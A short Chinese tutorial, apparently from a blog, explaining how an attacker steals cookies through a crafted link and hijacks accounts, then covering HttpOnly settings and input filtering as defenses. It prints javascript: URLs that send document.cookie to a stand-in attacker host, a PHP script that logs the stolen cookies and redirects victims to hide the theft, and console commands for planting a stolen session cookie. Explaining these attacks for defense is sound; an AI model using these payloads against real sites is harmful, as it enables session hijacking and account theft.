简析小黑是如何盗取cookie登录用户账号

都说cookie不安全,现在通过一个很简单的例子来说明它为什么不安全。

对于cookie的概念这里就不做阐述了。前端截取cookie的方式有多种,下面介绍一种比较简单的手法。

首先:

小黑会在各种网站发布帖子,然后在某些特定的地方添加吸引人点击的内容,而该内容会有一些超链接。比如在A网站,小黑在发布的内容中加个超链接:

点击我,跳转到B网站

然后JS_URL 用如下形式:

javascript:window.location.href='http://www.getcookie.com/info.php?usercookie='+document.cookie;

或者

javascript:window.open('http://www.getcookie.com/info.php?usercookie='+document.cookie);

 

然后:

小黑在自己的服务器上也就是www.getcookie.com 上写好脚本info.php,接收以上超链接传输过来的cookie。

Info.php

$info=$_GET[‘usercookie’];

if($info){

    file_put_contents('./cookie_log.txt', $info.PHP_EOL, FILE_APPEND);

}

header("Location:http://www.B.com");//因为超链接是要跳转到B网站,拿到cookie后再给他跳转,不容易被发现。

 

最后:

小黑拿到其他用户的cookie后,在A网站登录自己的账号,然后只需要将自己账号的cookie改成前面截取到的cookie。具体步骤:

进入F12的控制台,执行:document.cookie = 'PHPSESSID= aaaaaaaaaaaa;'; 有的网站有多个cookie,每个cookie会对应不同子域名,所有这种需要在设置cookie时加上有效的域名和目录等。比如:document.cookie = PHPSESSID =aaaaaaaaaaaa;'+ 'path=/;'+ 'domain=.A.com';  表示一级域名下有效。

如果没有A网站的账号,也可以直接设置cookie到该网站的域名下,不过这样可能花费的调试时间多些,因为有些网站有多个cookie,各个cookie对应的子域名、目录等可能不一样。如果自己有一个账号,只要登录后替换对应键的cookie值就可以了。

除了在控制台执行document.cookie,也可以Application项目的Cookies栏目下修改cookie值。

刷新一下,就能获得别人账号的权限了。

 

对于这种XSS攻击,有时真的是防不胜防,但也还得防。

比如设置cookie为 http_only 状态,这样前端就无法通过document.cookie截取到该cookie值。比如php的设置方法:

方法一、在php.ini配置文件中进行cookie只读设置的开启 :session.cookie_httponly = On

方法二、在php代码顶部设置
ini_set("session.cookie_httponly", 1);
//php5.1以前版本设置方法:header("Set-Cookie: hidden=value; httpOnly");
?>

其他的,则需要对用户提交的内容进行特殊字符过滤。特别是代码段。这样,能够在某种程度上防止XSS攻击。

你可能感兴趣的:(简析小黑是如何盗取cookie登录用户账号)